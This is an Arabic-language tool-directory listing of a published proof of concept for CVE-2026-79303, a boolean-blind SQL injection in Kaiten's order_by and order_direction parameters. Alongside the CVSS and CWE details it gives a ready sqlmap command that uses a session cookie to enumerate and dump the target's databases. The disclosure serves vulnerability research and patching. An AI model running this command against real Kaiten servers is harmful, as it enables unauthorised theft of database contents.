Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/4ybrick/cve-2026-79303
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراق
GitHub4ybrick/cve-2026-79303

CVE-2026-79303

إثبات المفهوم لـ CVE-2026-79303، وهي ثغرة حقن SQL أعمى منطقي حرجة في Kaiten تؤثر على معاملات order_by و order_direction، مع خطوات إعادة الإنتاج وتفاصيل CVSS 9.9.

عرض المستودع
منذ 20س 22دلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-79303

حقن SQL أعمى (Boolean-blind SQL injection)

الوصف: يتم إنشاء عبارات SQL ديناميكية دون التحقق المطلوب من البيانات ودون استخدام عبارات مُعلمة أو إجراءات مخزنة.

الأثر: SQLi

متجه CVSSv3.1: AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H (9.9 حرج)

CWE: CWE-89: تحييد غير صحيح للعناصر الخاصة المستخدمة في أمر SQL ('حقن SQL')

المكوّن المتأثر: معاملات GET order_by و order_direction

البائع: kaiten

المنتج المتأثر

  • إصدارات kaiten: 57.192.20 < 57.214.26

خطوات إعادة الإنتاج:

  1. sqlmap -u "https://[kaiten ip]/api/cards?version=2&limit=51&query=1&order_by=1&order_direction=desc&search_fields=title" --cookie="connect.sid=[value]" -p 'order_by' --technique B --level 5 --dbms postgresql --dbs --dump
  2. اكتب n (لا تدمج ملف تعريف الارتباط الخاص بك مع ملف جديد) -> C
Уязвимый параметр

المكتشف

  • Danil Belov

المراجع

  • https://nvd.nist.gov/vuln/detail/CVE-2026-79303
  • https://bdu.fstec.ru/vul/2025-02933
  • https://kaiten.ru/
تنزيل الأداة